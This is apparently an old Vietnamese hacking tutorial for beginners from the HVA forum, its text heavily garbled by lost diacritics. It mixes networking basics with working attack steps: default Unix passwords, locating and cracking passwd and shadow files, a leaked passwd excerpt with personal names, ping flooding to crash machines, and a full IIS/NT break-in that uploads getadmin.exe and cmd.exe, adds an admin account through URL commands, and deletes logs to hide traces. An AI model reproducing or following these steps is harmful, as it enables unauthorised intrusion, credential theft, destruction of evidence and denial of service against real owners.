dng IP address nhn bit s tn ti ca mnh,v vy IP l s quan tm hng u ca cc ATK,khi hack vo bt c h thng mng no th cng phi bit a ch IP ca h thng mng .Cc ATK s gi mo IP address thm nhp vo h thng v sau c th lm g mnh thch nh cu hnh li h thng ,sa i thng tin ... c rt nhiu th m h quan tm Cn nhiu kiu tn cng khc na cc bn c th tm hiu thm trn net bit u chnh bn to ra mt phng php mi th sao c th lm ch t tin ln cc bn.

############################################################# ########## Author by : Anhdenday ( Staff of HVA ), and Hackertt ( Staff of HVA ) Website : http:// www.vnhacker.org/forum/ Edit by : PTV5 Group Website : http://www.ptv5online.com ; http://www.ptv5online.net ############################################################# ########## T bch : Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ? Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mt cch tng qut , hiu cc thut ng m nhng ngi rnh v mng hay s dng . Ring ti th cha tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt s kin thc c bn , mun chia s cho tt c cc bn , nhm cng cc bn hc hi . Ti s khng chu trch nhim nu cc bn dng n quy ph ngI khc . Cc bn c th copy hoc post trong cc trang Web khc nhng hy in tin tc gi dI bi , tn trng bi vit ny cng chnh l tn trng ti v cng sc ca ti , ng thI cng tn trng chnh bn thn cc bn . Trong

ny ti cng c chn thm mt s cch hack , crack v v d cn bn , cc bn c th ng dng th v nghin cu c n hiu thm , r khi bt gp mt t m cc bn khng hiu th hy c bi ny bit , trong ny ti c s dng mt s ca bi vit m ti thy rt hay t trang Web ca HVA , v cc trang Web khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi l vn chnh . ===================================== =============== 1 . ) Ta cn nhng g bt u ? C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l cc bn hy dng HH Window 9X , rI n cc ci khc mnh hn l Linux hoc Unix , dI y l nhng ci bn cn c : + Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .) + Mt ci trang Web tt ( HVA chng hn hi`hi` ) + Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l l Gozzila ) + Mt cng c chat tt ( mIRC ,Yahoo Mass ..) + Telnet ( hoc nhng ci tng t nh nmap ) + Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phI c mt cht kin thc v lp trnh ( C , C++ , Visual Basic , Pert ..) 2 . ) Th no l mt a ch IP ? _ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1 byte -> !P c kicks thc l 4byte, c chia thnh cc lp a ch. C 3 lp l A, B, v C. Nu lp A, ta s c th c 16 triu i ch, lp B c 65536 a ch. V d: lp B vi 132.25,chng ta c tt c cc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cc a ch lp A ll s hu ca cc cng ty hay ca t chc. Mt ISP thng s hu mt vi a ch lp B hoc C. V d: Nu a ch IP

ca bn l 132.25.23.24 th bn c th xc nh ISP ca bn l ai. ( c IP l 132.25.x.) _ IP l t vit tt ca Internet Protocol, trn Internet th a ch IP ca mI ngi l duy nht v n s I din cho chnh ngI , a ch IP c s dng bi cc my tnh khc nhau nhn bit cc my tnh kt ni gia chng. y l l do ti sao bn li b IRC cm, v l cch ngi ta tm ra IP ca bn. a ch IP c th d dng pht hin ra, ngi ta c th ly c qua cc cch sau : + bn lt qua mt trang web, IP ca bn b ghi li + trn IRC, bt k ai cng c th c IP ca bn + trn ICQ, mi ngi c th bit IP ca bn, thm ch bn chn "do not show ip" ngi ta vn ly c n + nu bn kt ni vi mt ai , h c th g "systat n ", v bit c ai ang kt ni n h + nu ai gi cho bn mt email vi mt on m java tm IP, h cng c th tm c IP ca bn ( Ti liu ca HVA ) 3 . ) Lm th no bit c a ch IP ca mnh ? _ Trong _ Trong mIRC : kt nI n my ch sau nh lnh /dns <your nick> _ Thng qua mt s trang Web c hin th IP . 4 . ) IP Spoofing l g ? _ Mt s IP c mc ch xc nh mt thit b duy nht trn th gii. V vy trn mng mt my ch c th cho php mt thit b khc trao i d liu qua li m khng cn kim tra my ch. Tuy nhin c th thay i IP ca bn, ngha l bn c th gi mt thng tin gi n mt my khc m my s tin rng thng tin nhn c xut pht t mt my no (tt nhin l khng phi my ca bn). Bn c th vt qua my ch m khng cn phi c quyn iu khin my ch . iu

tr ngi l ch nhng thng tin phn hi t my ch s c gi n thit b c IP m chng ta gi mo. V vy c th bn s khng c c s phn hi nhng thng tin m mnh mong mun. C l iu duy nht m spoof IP c hiu qu l khi bn cn vt qua firewall, trm account v cn du thng tin c nhn! ( Ti liu ca HVA ) 5 . ) Trojan / worm / virus / logicbomb l ci g ? _ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vo my ca ngI khc n cp nhng ti liu trn my gI v cho ch nhn ca n , Ci m n n cp c th l mt khu , accourt , hay cookie . tu theo mun ca ngI ci n . _ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit c ci ( hoc ly lan t my khc ) ln my ca nn nhn v thc hin nhng yu cu ca m , a s virut c s dng ph hoI d liu hoc ph hoI my tnh . _ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly lan khp bn trong mng .Cng ging nh Virut , n cng c th ph hoI d liu , hoc n c th ph hoI bn trong mng , nhiu khi cn lm down c mang . _ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mt a ch , lm ngp lt h thng , tt nghn ng truyn ( trn server ) hoc dng lm cng c khng b I phng ( bom Mail ) ;) . 6 . ) PGP l g ? _ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng s m ho cha kho cng cng bo v nhng h s Email v d liu , l dng m ho an ton cao s dng phn mm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khc .

7 . ) Proxy l g ? _Proxy cung cp cho ngi s dng truy xut internet vi nhng host n. Nhng proxy server phc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dung s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip n nhng yu cu t clientn server, cng nh p ng nhng yu cu ca server n client. V vy proxy server ging cu ni trung gian gia server v client . _ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vi dual host homed cn phi login vo host trc khi s dng dch v no trn internet. iu ny thng khng tin li, v mt s ngi tr nn tht vng khi h c cm gic thng qua firewall, vi proxy n gii quyt c vn ny. Tt nhin n cn c nhng giao thc mi nhng ni chung n cng kh tin li cho user. Bi v proxy cho php user truy xut nhng dch v trn internet t h thng c nhn ca h, v vy n khng cho php packet i trc tip gia h thng s dng v internet. ng i l ging tip thng qua dual homed host hoc thng qua s kt hp gia bastion host v screening rounter. ( Bi vit ca Z3RON3 ti liu ca HVA ) 8 . ) Unix l g ? _ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht , v thn thit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH ny khng th thiu i vI bn . N c s dng h tr cho lp trnh ngn ng C . 9 . ) Telnet l g ?

_ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng ( port ) . MI my tnh hoc my ch ( server ) u c cng , sau y l mt s cng thng dng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 . 10 . ) Lm th no bit mnh Telnet n h thng Unix ? _ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .) By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn s thy c mt mt khu , bn hy th nhp Default Password th theo bng sau : Account-------------------------Default Password Root-----------------------------------------------Root Sys------------------------------------------------Sys / System / Bin Bin-------------------------------------------------Sys / Bin Mountfsy------------------------------------------Mountfsys Nuuc-----------------------------------------------Anon Anon-----------------------------------------------Anon User------------------------------------------------User

Games---------------------------------------------Games Install----------------------------------------------Install Demo-----------------------------------------------Demo Guest----------------------------------------------Guest 11 . ) shell account l ci g ? _ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI ( terminal ) m vI n bn c th nh lnh n mt my tnh ang chy Unix , Shell l chng trnh c nhim v dch nhng k t ca bn gi n rI a vo thc hin lnh ca chng trnh Unix . VI mt shell account chnh xc bn c th s dng c mt trm lm vic mnh hn nhiu so vI ci m bn c th tng tng n c . Bn c th ly c shell account min ph tI trang Web www.freeshell.com tuy nhin bn s khng s dng c telnet cho n khi bn tr tin cho n . 12 . ) Lm cch no bn c th crack Unix account passwords ? _ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI , cc bn c th crack c chng nu cc bn may mn , cn khng th cc bn c tham kho . _ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khch hng hoc mt ngI khch gh thm , nu may mn bn s ly c mt khu c ct du trong nhng h thng chun nh : /etc/passwd mi hng trong mt h s passwd c mt ti khon khc nhau , n ging nh hng ny : userid:password:userid#:groupid#:GECOS field:home dir:shell

trong : + userid = the user id name : tn ng nhp : c th l mt tn hoc mt s . + password : mt m . Dng lm g hn cc bn cng bit rI . + userid# : l mt s duy nht c thng bo cho ngI ng k khi h ng k mI ln u tin . + groupid# : tng t nh userid# , nhng n c dng cho nhng ngI ang trong nhm no ( nh nhm Hunter Buq ca HVA chng hn ) + GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y , s in thoi , a ch v.v. . y cng l ngun tt ta d dng crack mt mt khu . + home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm ( ging nh mc History trong IE vy ) + Shell : y l tn ca shell m n t ng bt u khi ta login . _ Hy ly file password , ly file text m ho v , sau bn dng chng trnh "CrackerJack" hoc "John the Ripper" crack . _ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may mn bn c th crack c v hu ht by gi h ct rt k , hy c tip bn s thy kh khn ch no . 13 . ) shadowed password l ci g ? _ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt mt khu , th ngI khc ch thy c trnh n ca n ( nh k hiu X hoc * ) . Ci ny thng bo cho bn bit l file passwd c ct gi ni khc , ni m mt ngI s dng bnh thng khng th n c . Khng l ta nh b tay , d nhin l I vI mt hacker th khng ri , ta khng n c trc tip file shadowed password th ta hy tm file sao lu ca n , l file Unshadowed .

Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI ln lt nhng ng dn sau : CODE AIX 3 /etc/security/passwd ! or /tcb/auth/files/<first letter #of username>/<username> A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter *of username>/<username> SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever> System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo h thng tht s bn mun ly rI ln theo ng dn pha sau du /u tin . V cuI cng l nhng account passwd m ti tng crack c , c th by gi n ht hiu lc rI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh

armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc bn hy tm hiu thng tin c c t chng xem . ( (Ht phn 1 ) Cn rt nhiu nh ngha cng nh th thut hack v crack khc ti mun cng chia s vI cc bn , c bit l cc bn Newbie . Ti s ln lt post ln trong thi gian ti , mong c s ng gp kin ca cc bn nhng phn sau c vit hay hn . Hy nh , hack cng l mt ngh thut v rt cn s ham thch hc hi cng nh s kin tr ca cc bn . S c ngy cc bn cng s giI thi . Chc cc bn vui v . Bi vit ca ANHDENDAY y l phn 2 14 . ) Vitual port l g ? _ Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(Tranmission Control Protocol) v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows c th chy nhiu chng trnh 1 lc, mi chng trnh ny c 1 cng ring dng truyn v nhn d liu. V d 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3 server, etc, nhng dch v ny u uc chy trn 1 IP

address l 127.0.0.1, khi mt gi tin uc gi n lm th no my tnh ca chng ta phn bit c gi tin ny i vo dch v no WebServer hay FTP server hay SM! TP? Chnh v th Port xut hin. Mi dch v c 1 s port mc nh, v d FTP c port mc nh l 21, web service c port mc nh l 80, POP3 l 110, SMTP l 25 vn vn.... Ngi qun tr mng c th thay i s port mc nh ny, nu bn ko bit s port trn mt my ch, bn ko th kt ni vo dch v c. Chc bn tng nghe ni n PORT MAPPING nhng c l cha bit n l g v chc nng th no. Port mapping thc ra n gin ch l qu trnh chuyn i s port mc nh ca mt dch v no n 1 s khc. V d Port mc nh ca WebServer l 80, nhng thnh thong c l bn vn thy http://www.xxx.com:8080 , 8080 y chnh l s port ca host xxx nhng uc ngui qun tr ca host ny "map" t 80 thnh 8080. ( Ti liu ca HVA ) 15 . ) DNS l g ? _ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53, c ngha l nu bn mun kt ni vo my ch , bn phi kt ni n cng s 53. My ch chy DNS chuyn hostname bng cc ch ci thnh cc ch s tng ng v ngc li. V d: 127.0.0.1 --> localhost v localhost--->127.0.0.1 . ( Ti liu ca HVA ) 16 . ) i iu v Wingate : _ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra. Th d: bn c th chia s 1 modem vi 2 hoc nhiu my . WinGate dng vi nhiu proxy khc nhau c th che giu bn . _ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hy telnet trn cng 23 trn my ch chy WinGate

telnet proxy v bn s c du nhc WinGate > . Ti du nhc ny bn nh vo tn server, cng mt khong trng v cng bn mun kt ni vo. VD : CODE telnet wingate.net WinGate> victim.com 23 ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny IP trn my m victim chp c ca ta l IP ca my ch cha Wingate proxy . _ Lm sao tm Wingate ? + Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mt trang tm kim cable modem. Tm kim cable modems v nhiu ngi dng cable modems c WinGate h c th chia s ng truyn rng ca n cable modems cho nhng my khc trong cng mt nh . Hoc bn c th dng Port hay Domain scanners v scan Port 1080 . + tm IP ng (IP thay i mi ln user kt ni vo internet) ca WinGates bn c th dng Domscan hoc cc chng trnh qut khc . Nu dng Domscan bn hy nhp khong IP bt k vo box u tin v s 23 vo box th 2 . Khi c kt qu , bn hy th ln lt telnet n cc a ch IP tm c ( hng dn trn ), nu n xut hin du Wingate > th bn tm ng my ang s dng Wingate rI . + Theo kinh nghim ca ti th bn hy down wingatescanner v m si , n c rt nhiu trn mng . 17 . ) i iu v Traceroute : _ Traceroute l mt chng trnh cho php bn xc nh c ng i ca cc gi packets t my bn n h thng ch trn mng Internet. _ bn hy xem VD sau : CODE

C:\windows>tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops 1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms 2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms 3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms 4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms 5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms 7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms 8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms 9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms Ti cn bit ng i t my ti n mt host trn mng Internet c a ch ip l 203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi packets t my ti mun n c 203.94.12.54 phi i qua 13 hops(mc xch) trn mng. y l ng i ca cc gi packets . _ Bn hy xem VD tip theo : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets 1 isp.net (202.xy.34.12) 20ms 10ms 10ms 2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng ny cn cho chng ta bit thm gi tr TTL<=30 v kch thc ca datagram l 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data). + Dng th 2 cho bit router u tin nhn c datagram l 202.xy.34.12, gi tr ca TTL khi gi n router ny l 1. Router ny s gi tr li cho chng trnh traceroute mt ICMP message error "Time Exceeded". Traceroute s gi tip mt datagram n h thng ch. + Dng th 3, xyz.com(202.xx.12.34) nhn c datagram c TTL=1(router th nht gim mt trc - TTL=21=1). Tuy nhin, xyz.com khng phi l mt router, n s gi tr li cho traceroute mt ICMP error message "Port Unreachable". Khi nhn c ICMP message ny, traceroute s bit c n c h thng ch xyz.com v kt thc nhim v ti y. + Trong trng hp router khng tr li sau 5 giy, traceroute s in ra mt du sao "*"(khng bit) v tip tc gi datagram khc n host ch! _Ch : Trong windows: tracert hostname Trong unix: traceroute hostname ( Ti liu ca viethacker.net ) 18 . ) Ping v cch s dng : _ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn on mng. Tiu s ca t "ping" nh sau: Ping l ting ng vang ra khi 1 tu ngm mun bit c 1 vt th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s va vo vt th v ting vang li s l "pong" vy th tu ngm s bit l c g gn mnh. _Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn. Lnh Ping gi mt gi ICMP

(Internet Control Message Protocol) n host, nu host "pong" li c ngha l host tn ti (hoc l c th vi ti oc). Ping cng c th gip chng ta bit c lung thi gian mt gi tin (data packet) i t my tnh ca mnh n 1 host no . _Ping tht d dng, ch cn m MS-DOS, v g "ping a_ch_ip", mc nh s ping 4 ln, nhng bn cng c th g CODE "ping ip.address -t" Cch ny s lm my ping mi. thay i kch thc ping lm nh sau: CODE "ping -l (size) a_ch_ip " Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt bao lu gi tin ri xem xem sau bao lu gi tin quay tr li, cch ny xc nh c tc ca kt ni, v thi gian cn mt gi tin i v quay tr li v chia bn (gi l "trip time"). Ping cng c th c dng lm chm i hoc v h thng bng lt ping. Windows 98 treo sau mt pht lt ping (B m ca kt ni b trn c qua nhiu kt ni, nn Windows quyt nh cho n i ngh mt cht). Mt cuc tn cng ping flood s chim rt nhiu bng thng ca bn, v bn phi c bng thng ln hn i phng ( tr khi i phng l mt my chy Windows 98 v bn c mt modem trung bnh, bng cch bn s h gc i phng sau xp x mt pht lt ping). Lt Ping khng hiu qu lm i vi nhng i phng mnh hn mt cht. tr khi bn c nhiu ng v bn kim sot mt s lng tng i cc my ch cng ping m tng bng thng ln hn i phng.

Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mt cch lin tc, vi nhng khong ngt qung gia hai ln ping lin tip. Trong tt c cc h Unix hoc Linux, bn c th dng ping -f gy ra lt thc s. Thc t l phi ping -f nu bn dng mt bn tng thch POSIX (POSIX - Portable Operating System Interface da trn uniX), nu khng n s khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng mt h iu hnh m n t cho n l Unix hay Linux, n s c tham s -f. ( Ti liu ca HVA v viethacker.net ) 19 . ) K thut xm nhp Window NT t mng Internet : _ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu v hack , by gi ti s by li cho cc bn . bn s cn phI c mt s thI gian thc hin c n v n tuy d nhng kh . Ta s bt u : _ u tin bn cn tm mt server chy IIS : _ Tip n bn vo DOS v nh ' FTP <the company name>'. VD : c:\Ftp www.dodgyinc.com ( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha , nu bn no c trang no khc th hy post ln cho mI ngI cng lm nh ) Nu connect thnh cng , bn s thy mt s dng tng t nh th ny : CODE Connected to www.dodgyinc.com. 220 Vdodgy Microsoft FTP Service (Version 3.0). User (www.dodgyinc.com:(none)): Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bit tn Netbios ca my tnh l Vdodgy

. T iu ny bn c th suy din ra tn m c s dng cho NT cho php ta c th khai thc , mc nh m dch v FTP gn cho n nu n cha i tn s l IUSR_VDODGY . Hy nh ly v n s c ch cho ta . Nhp "anonymous trong user n s xut hin dng sau : CODE 331 Anonymous access allowed, send identity (e-mail name) as password. Password: By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nh vo passwd l anonymous . Nu n sai , bn hy log in lI thit b FTP , bn hy nh l khi ta quay lI ln ny th khng s dng cch mo danh na ( anonymous ) m s dng 'Guest , th li passwd vi guest xem th no . By gi bn hy nh lnh trong DOS : CODE Cd /c V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bn hy nhanh chng tm th mc 'cgi-bin' . Nu nh bn may mn , bn s tm c d dng v thng thng h thng qun l t 'cgi-bin' vo ni m ta va xm nhp cho cc ngI qun l h d dng iu khin mng hn . th mc cgi-bin c th cha cc chng trnh m bn c th li dng n chy t trnh duyt Web ca bn . Ta hy bt u quy no . _ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary ( c th cc bn khng cn dng lnh ny ) , sau bn dnh tip lnh put cmd.exe . Tip theo l bn cn c file hack ci vo th mc ny , hy tm trn mng ly 2 file quan trng nht l 'getadmin.exe' v 'gasys.dll' . Download chng xung , mt khi bn c n

hy ci vo trong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca s DOS . By gi bn hy nh a ch sau ln trnh duyt ca bn : http://www.dodgyinc.com/cgibin/getadmin.exe?IUSR_VDODGY Sau vi giy bn s c c cu tr li nh dI y : CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Congratulations , now account IUSR_VDODGY have administrator rights! Th l bn mo danh admin xm nhp h thng , vic cn thit by gi l bn hy t to cho mnh mt account , hy nh dng sau trn IE : http://www.dodgyinc.com/cgibin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20 hacker%20toilahacker%20/add dng lnh trn s to cho bn mt account login vi user : anhdenday v passwd : toilahackerBy gi bn hy l cho user ny c account ca admin , bn ch cn nh ln IE lnh : http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday Vy l xong ri , bn hy disconnect v n start menu > find ri search computer 'www.dodgyinc.com'. Khi tm thy , bn vo explore , explore NT s m ra bn hay nhp user v passwd m n ( ca ti l user : anhdenday v passwd : toilahacker ) .

C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt bn hy vo 'Winnt\system32\logfiles' m file log rI xo nhng thng tin lin quan n bn , rI save chng . Nu bn mun ly mt thng bo g v vic chia s s xm nhp th bn hy thay i ngy thng trn my tnh vI URL sau : http://www.dodgyinc.com/cgibin/cmd.exe?/c%20date%2030/04/03 xong rI bn hy xo file 'getadmin.exe', v 'gasys.dll' t 'cgi-bin' . Mc ch khi ta xm nhp h thng ny l chm pass ca admin ln sau xm nhp mt cch hp l , do bn hy tm file SAM ( cha pass ca admin v member ) trong h thng rI dng chng trnh l0pht crack crack pass ( Hng dn v cch s dng l0pht crack v 3.02 ti post ln ri ,cc bn hy t nghin cu nh ) . y l link : http://vnhacker.org/forum/?act=ST&f=6&t=11566&s= Khi crack xong cc bn c user v pass ca admin rI , by gi hy xo account ca user ( ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h thng l tu thch , nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm . Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti my m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian hn . phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt Web site , v lm th no hack mt trang web n gin nht .v.v GOOKLUCK !!!!!! ( (Ht phn 2 ) Bi vit ca ANHDENDAY

Xin mn php a ra mt vi b sung v phn IP.Mong anhdenday ng gin. 1-Lm sao bit a ch IP ca mnh trong mng LAN ? Rt n gin ,bn thot ra DOS : Start ->Programs -> Command Prompt. C:\windows> Bn nh C:\windows>tracert PC1 (trong PC1 l tn my tnh ca bn) Bn s c kt qu Tracing route to COMPUTER1[192.168.0.1] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms [192.168.0.1] Trace complete. 198.168.0.1 chnh l a ch IP ca bn trong mng LAN Mi a ch IP gm 2 phn : 1 l a ch mng v 1 a ch host . Tt c cc my tnh trong 1 mng c a ch mng ging nhau v trong khi a ch host th duy nht vi ch 1 my tnh . a ch mng c th chim 1 n 3 nhm Vd : vI a ch IP 192.168.0.1 th 192.168.0 l a ch mng cn 1 l a ch host . Cc my c th cng a ch mng nhng bt buc phI khc a ch host . 2-Lm sao ly c a ch IP ca mt ngi , mt website hay mt my tnh khc ?

*Gi s bn mun ly a ch IP ca www.yahoo.com . Bn lm n gin nh sau . Thot ra DOS . Bn g C:\windows>ping www.yahoo.com Pinging yahoo.com [216.115.108.245] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Here 216.115.108.245 is the ip address of www.yahoo.com *Cng nh vy, nu bn mun ly 1 a ch IP ca 1 my tnh tn PC2 trong 1 mng LAN bn s c c a ch IP ca PC2 C:\windows>ping PC2 *Ly IP ca mt ngi ang chat vi mnh : -S dng ICQ Ch cn hi anh ta c ng ni vi bn trn ICQ, nu c s tr li c ngha kt ni c thc hin . Trong khi ang chat bn tm thot ra DOS v g netstat -n v bn s ly c a ch IP ca anh ta . Nhng bn phi chc chn rng bn khng s dng bt k 1 phn mm no lin kt vi Internet khc bi v iu c th cho bn nhiu a ch IP gm a ch ca anh ta v nhng dch v bn ang kt ni s c xut ra khi g netstart -n (bi sau s ni r hn v cc lnh ca netstart)

-S dng MSN v YAHOO MESSENGERS Trong trng hp s dng cc chng trnh Yahoo hay MSN chat. Nu bn s dng lnh netstart -n bn s khng ly c a ch IP ca ngi mnh ang chat . Chng ta lm cch no ly y ??? C mt cch l . Bn ni rng bn s gi cho anh ta 1 bi nhc rt hay hoc l 1 th g bng cch SEND FILE . Nu anh ta ng bn hy gi cho anh ta 1 file m anh ta thch . Trong khi file c gi i bn tm thot ra DOS v g lnh netstart -n v bn s tm thy a ch ca anh ta v khi gi 1 file th s kt ni ca bn v anh ta l trc tip khng phi qua server ca Yahoo hay MSN x l -Ly a ch IP ca nhng ngi n thm website ca bn Bn c 1 website v bn mun ly cc a ch IP ca nhng ngi n thm website ca bn. Bn c th vit 1 script trong m trang HTML ca website bn nh sau . Chng ta ch cn vit cho trang chnh m thi y l on script m bn s gn vo trang web ca bn. <HTML> <HEAD> <script LANGUAGE="JavaScript"> var ip = new java.net.InetAddress.getLocalHost(); var ipStr = new java.lang.String(ip); document.writeln(ipStr.substring(ipStr.indexOf("/")+1)); </SCRIPT> </HEAD> Ch on script ny c th khng chy trn 1 s trnh brower (duyt web) Li cm n : Trc ht , ti xin cm n nhng tc gi m ti mn bi vit ca h lm cho ti hon thnh nhng bi vit ca mnh , sau l cm n n anh thesun

ng vin n em , cm n bn Hackett v bn vol2 b sung cho bi vit ca ti c hon chnh hn . Ti cng ang rt cn nhng kin qu bu ca cc bn b sung lm hon chnh bi vit ca mnh , vy bn no nu c kin b sung hoc phn bc li th c post bi ln nh . Ti rt mong ===================================== =============== y l phn 3 20 . ) Cookie l g ? _ Cookie l nhng phn d liu nh c cu trc c chia s gia web site v browser ca ngi dng. cookies c lu tr di nhng file d liu nh dng text (size di 4k). Chng c cc site to ra lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm site v nhng vng m h i qua trong site. Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi quen...Cookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh, ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin v ngi dng c lu tr trong cookie. nhng ln truy cp sau n site , web site c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp vo 1 forum...) m ngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng tin khc. Vn t ra l c nhiu site qun l vic dng li cc thng tin lu trong cookie ko chnh xc, kim tra ko y hoc m ho cc thng tin trong cookie cn s h gip cho hacker khai thc vt qua cnh ca ng nhp, ot quyn iu khin site . _ Cookies thng c cc thnh phn sau :

